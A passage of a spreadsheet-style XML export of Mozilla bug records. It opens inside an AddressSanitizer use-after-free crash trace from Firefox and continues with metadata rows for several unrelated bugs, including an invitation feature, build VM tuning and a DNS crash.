    #35 0x7f2fee31235f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #36 0x7f2fee31235f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #37 0x7f2fee2f751d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #38 0x7f2fee3325bf in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #39 0x7f2fee332c02 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #40 0x7f2fede050ad in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #41 0x7f2fe7b0d7ff in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #42 0x7f2fe850398a in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #43 0x7f2fe850398a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #44 0x7f2fe84cf99d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
    #45 0x7f2fe84d13c7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
    #46 0x7f2fe84bc4f6 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #47 0x7f2fe84bfb88 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #48 0x7f2fea5f5a8c in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1023:7
    #49 0x7f2feb38399b in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7630:5
    #50 0x7f2feb37f7a4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7434:7
    #51 0x7f2feb386e0f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7331:13
    #52 0x7f2fe56eb510 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #53 0x7f2fe56ea4a8 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #54 0x7f2fe56e7208 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #55 0x7f2fe56e9304 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #56 0x7f2fe56e9ebc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #57 0x7f2fe3c9a2ca in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #58 0x7f2fe66a5a86 in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8640:7
    #59 0x7f2fe66a5456 in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8568:9
    #60 0x7f2fe667b904 in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5055:3
    #61 0x7f2fe6739f72 in applyImpl&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
    #62 0x7f2fe6739f72 in apply&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
    #63 0x7f2fe6739f72 in mozilla::detail::RunnableMethodImpl&lt;void (nsDocument::*)(), true, false&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
    #64 0x7f2fe3ac63bb in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #65 0x7f2fe3b4578c in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #66 0x7f2fe48c112f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #67 0x7f2fe48337a8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #68 0x7f2fe48337a8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #69 0x7f2fe48337a8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #70 0x7f2fe9d0553f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #71 0x7f2febcf8f21 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #72 0x7f2febe815ce in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
    #73 0x7f2febe82add in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
    #74 0x7f2febe8399c in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
    #75 0x4df8ca in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
    #76 0x4df8ca in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
    #77 0x7f2ffead982f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #78 0x41ba38 in _start (/home/nils/fuzzer3/esr/firefox/firefox+0x41ba38)
0x612000032330 is located 112 bytes inside of 264-byte region [0x6120000322c0,0x6120000323c8)
freed by thread T0 here:
    #0 0x4b218b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f2fe399b564 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2665:9
    #2 0x7f2fe399acf5 in ~RemoveSkippableVisitor /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2776:3
    #3 0x7f2fe399acf5 in nsPurpleBuffer::RemoveSkippable(nsCycleCollector*, bool, bool, void (*)()) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2817
    #4 0x7f2fe399b8d3 in nsCycleCollector::ForgetSkippable(bool, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2864:3
    #5 0x7f2fe39a4849 in nsCycleCollector_forgetSkippable(bool, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4097:3
    #6 0x7f2fe678eea8 in FireForgetSkippable(unsigned int, bool) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1240:3
    #7 0x7f2fe679180d in CCTimerFired(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1813:7
    #8 0x7f2fe6794749 in nsJSContext::NotifyDidPaint() /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:2605:5
    #9 0x7f2fea3b6ae4 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2050:5
    #10 0x7f2fea3c0e11 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:295:7
    #11 0x7f2fea3c08b8 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:317:5
    #12 0x7f2fea3c33ce in applyImpl&lt;mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), StoreCopyPassByValue&lt;mozilla::TimeStamp&gt; , 0&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
    #13 0x7f2fea3c33ce in apply&lt;mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp)&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
    #14 0x7f2fea3c33ce in mozilla::detail::RunnableMethodImpl&lt;void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), true, false, mozilla::TimeStamp&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
    #15 0x7f2fe3ac63bb in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #16 0x7f2fe3b4578c in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #17 0x7f2feb4d0c6d in nsXULWindow::ShowModal() /home/worker/workspace/build/src/xpfe/appshell/nsXULWindow.cpp:408:12
    #18 0x7f2feb3f3008 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/embedding/components/windowwatcher/nsWindowWatcher.cpp:1323:7
    #19 0x7f2feb3ee8ee in nsWindowWatcher::OpenWindow(mozIDOMWindowProxy*, char const*, char const*, char const*, nsISupports*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/embedding/components/windowwatcher/nsWindowWatcher.cpp:353:10
    #20 0x7f2feb8fdb6e in nsNSSDialogHelper::openDialog(mozIDOMWindowProxy*, char const*, nsISupports*, bool) /home/worker/workspace/build/src/security/manager/pki/nsNSSDialogHelper.cpp:47:8
    #21 0x7f2feb9019e3 in DisplayGeneratingKeypairInfo /home/worker/workspace/build/src/security/manager/pki/nsNSSDialogs.cpp:365:8
    #22 0x7f2feb9019e3 in non-virtual thunk to nsNSSDialogs::DisplayGeneratingKeypairInfo(nsIInterfaceRequestor*, nsIKeygenThread*) /home/worker/workspace/build/src/security/manager/pki/nsNSSDialogs.cpp:358
    #23 0x7f2feb85f5f5 in nsKeygenFormProcessor::GetPublicKey(nsAString_internal const&amp;, nsAString_internal const&amp;, nsString const&amp;, nsAString_internal&amp;, nsAString_internal const&amp;) /home/worker/workspace/build/src/security/manager/ssl/nsKeygenHandler.cpp:606:18
    #24 0x7f2feb860acb in nsKeygenFormProcessor::ProcessValue(nsIDOMHTMLElement*, nsAString_internal const&amp;, nsAString_internal&amp;) /home/worker/workspace/build/src/security/manager/ssl/nsKeygenHandler.cpp:755:12
    #25 0x7f2fe87e91f2 in mozilla::dom::HTMLSelectElement::SubmitNamesValues(mozilla::dom::HTMLFormSubmission*) /home/worker/workspace/build/src/dom/html/HTMLSelectElement.cpp:1704:11
    #26 0x7f2fe87e96cc in non-virtual thunk to mozilla::dom::HTMLSelectElement::SubmitNamesValues(mozilla::dom::HTMLFormSubmission*) /home/worker/workspace/build/src/dom/html/HTMLSelectElement.cpp:1659:20
    #27 0x7f2fe86c191c in mozilla::dom::HTMLFormElement::WalkFormElements(mozilla::dom::HTMLFormSubmission*) /home/worker/workspace/build/src/dom/html/HTMLFormElement.cpp:1059:5
    #28 0x7f2fe64c09a1 in mozilla::dom::FormData::Constructor(mozilla::dom::GlobalObject const&amp;, mozilla::dom::Optional&lt;mozilla::dom::NonNull&lt;mozilla::dom::HTMLFormElement&gt; &gt; const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/FormData.cpp:393:11
    #29 0x7f2fe7cb488b in mozilla::dom::FormDataBinding::_constructor(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FormDataBinding.cpp:1033:54
    #30 0x7f2fee332efc in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #31 0x7f2fee332efc in CallJSNativeConstructor /home/worker/workspace/build/src/js/src/jscntxtinlines.h:272
    #32 0x7f2fee332efc in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:562
    #33 0x7f2fee3122c8 in ConstructFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:588:12
    #34 0x7f2fee3122c8 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2914
    #35 0x7f2fee2f751d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #36 0x7f2fee3325bf in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
previously allocated by thread T0 here:
    #0 0x4b24ab in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0d9d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f2fe84f9a98 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f2fe84f9a98 in mozilla::IMEStateManager::CreateIMEContentObserver(nsIEditor*) /home/worker/workspace/build/src/dom/events/IMEStateManager.cpp:1599
    #4 0x7f2fe84fc822 in mozilla::IMEStateManager::UpdateIMEState(mozilla::widget::IMEState const&amp;, nsIContent*, nsIEditor*) /home/worker/workspace/build/src/dom/events/IMEStateManager.cpp:836:5
    #5 0x7f2fe9e3bcd9 in mozilla::EditorBase::PostCreate() /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:331:5
    #6 0x7f2fea0258ba in nsEditingSession::SetupEditorOnWindow(mozIDOMWindowProxy*) /home/worker/workspace/build/src/editor/composer/nsEditingSession.cpp:481:10
    #7 0x7f2fea022176 in nsEditingSession::MakeWindowEditable(mozIDOMWindowProxy*, char const*, bool, bool, bool) /home/worker/workspace/build/src/editor/composer/nsEditingSession.cpp:173:10
    #8 0x7f2fe88a05b3 in nsHTMLDocument::EditingStateChanged() /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2763:12
    #9 0x7f2fe88b452c in SetDesignMode /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2867:10
    #10 0x7f2fe88b452c in nsHTMLDocument::SetDesignMode(nsAString_internal const&amp;, nsIPrincipal&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2850
    #11 0x7f2fe7d7eb5a in mozilla::dom::HTMLDocumentBinding::set_designMode(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:757:3
    #12 0x7f2fe81072e3 in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2847:8
    #13 0x7f2fee331f55 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #14 0x7f2fee331f55 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #15 0x7f2fee333c98 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #16 0x7f2fee333c98 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:650
    #17 0x7f2fee3990cf in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2434:10
    #18 0x7f2fee3990cf in js::NativeSetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::QualifiedBool, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2469
    #19 0x7f2fee04b628 in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1540:12
    #20 0x7f2fee04b628 in js::SetPropertyIgnoringNamedGetter(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::PropertyDescriptor&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/proxy/BaseProxyHandler.cpp:182
    #21 0x7f2fe8111345 in mozilla::dom::DOMProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /home/worker/workspace/build/src/dom/bindings/DOMJSProxyHandler.cpp:258:10
    #22 0x7f2fee07cb01 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:333:12
    #23 0x7f2fedf5c79a in JSObject::nonNativeSetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/jsobj.cpp:1022:12
    #24 0x7f2fee30b03f in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1539:16
    #25 0x7f2fee30b03f in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:259
    #26 0x7f2fee30b03f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2715
    #27 0x7f2fee2f751d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #28 0x7f2fee3325bf in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #29 0x7f2fee332c02 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #30 0x7f2fede050ad in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #31 0x7f2fe7b0d7ff in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #32 0x7f2fe850398a in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #33 0x7f2fe850398a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #34 0x7f2fe84cf99d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
    #35 0x7f2fe84d13c7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
    #36 0x7f2fe84bc4f6 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #37 0x7f2fe84bfb88 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #38 0x7f2fea5f5a8c in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1023:7
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:763:45 in operator bool
Shadow bytes around the buggy address:
  0x0c247fffe410: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c247fffe420: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fffe430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fffe440: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
  0x0c247fffe450: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=&gt;0x0c247fffe460: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
  0x0c247fffe470: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c247fffe480: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c247fffe490: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c247fffe4a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x0c247fffe4b0: fa fa fa fa fa fa fa fa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5393==ABORTING</t>
        </is>
      </c>
      <c r="X2076" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2077">
      <c r="A2077" t="n">
        <v>657056</v>
      </c>
      <c r="B2077" t="inlineStr">
        <is>
          <t>2011-05-13 16:13:17 -0700</t>
        </is>
      </c>
      <c r="C2077" t="inlineStr">
        <is>
          <t>Vouched users can invite people to register an already vouched account</t>
        </is>
      </c>
      <c r="D2077" t="inlineStr">
        <is>
          <t>2012-04-19 20:30:40 -0700</t>
        </is>
      </c>
      <c r="E2077" t="n">
        <v>1</v>
      </c>
      <c r="F2077" t="n">
        <v>1</v>
      </c>
      <c r="G2077" t="n">
        <v>5</v>
      </c>
      <c r="H2077" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2077" t="inlineStr">
        <is>
          <t>Participation Infrastructure</t>
        </is>
      </c>
      <c r="J2077" t="inlineStr">
        <is>
          <t>Phonebook</t>
        </is>
      </c>
      <c r="K2077" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2077" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2077" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2077" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2077" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2077" t="inlineStr"/>
      <c r="Q2077" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2077" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2077" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2077" t="n">
        <v>1</v>
      </c>
      <c r="U2077" t="n">
        <v>0</v>
      </c>
      <c r="V2077" t="n">
        <v>7</v>
      </c>
      <c r="W2077" t="inlineStr">
        <is>
          <t>Requirements/Spec:
https://wiki.mozilla.org/Mozillians/Releases/1.0/Invitations
The feature will allow already vouched users to invite other people to register a 'blessed' account via e-mail.</t>
        </is>
      </c>
      <c r="X2077" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2078">
      <c r="A2078" t="n">
        <v>489940</v>
      </c>
      <c r="B2078" t="inlineStr">
        <is>
          <t>2009-04-23 20:25:29 -0700</t>
        </is>
      </c>
      <c r="C2078" t="inlineStr">
        <is>
          <t>Retune Win32 VMs to speed up win32 build times</t>
        </is>
      </c>
      <c r="D2078" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2078" t="n">
        <v>1</v>
      </c>
      <c r="F2078" t="n">
        <v>1</v>
      </c>
      <c r="G2078" t="n">
        <v>5</v>
      </c>
      <c r="H2078" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2078" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2078" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2078" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2078" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2078" t="inlineStr">
        <is>
          <t>Windows Server 2003</t>
        </is>
      </c>
      <c r="N2078" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2078" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2078" t="inlineStr"/>
      <c r="Q2078" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2078" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2078" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2078" t="n">
        <v>1</v>
      </c>
      <c r="U2078" t="n">
        <v>0</v>
      </c>
      <c r="V2078" t="n">
        <v>20</v>
      </c>
      <c r="W2078" t="inlineStr">
        <is>
          <t>On the win32 VMs, change drive E from:
30GB FAT32
...to:
80gb NTFS.
This needs to be done as an temp interim step until we figure out if bug#472223 does scale or not. 
Already done are:
moz2-win32-slave01
moz2-win32-slave03
moz2-win32-slave06</t>
        </is>
      </c>
      <c r="X2078" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2079">
      <c r="A2079" t="n">
        <v>1868042</v>
      </c>
      <c r="B2079" t="inlineStr">
        <is>
          <t>2023-12-03 10:34:43 -0800</t>
        </is>
      </c>
      <c r="C2079" t="inlineStr">
        <is>
          <t>Crash in [@ mozilla::net::WebSocketChannel::DoStopSession] getting ObliviousHttpService in nsDNSService::Init()</t>
        </is>
      </c>
      <c r="D2079" t="inlineStr">
        <is>
          <t>2024-09-16 00:04:51 -0700</t>
        </is>
      </c>
      <c r="E2079" t="n">
        <v>1</v>
      </c>
      <c r="F2079" t="n">
        <v>1</v>
      </c>
      <c r="G2079" t="n">
        <v>3</v>
      </c>
      <c r="H2079" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2079" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2079" t="inlineStr">
        <is>
          <t>Networking: DNS</t>
        </is>
      </c>
      <c r="K2079" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2079" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2079" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2079" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
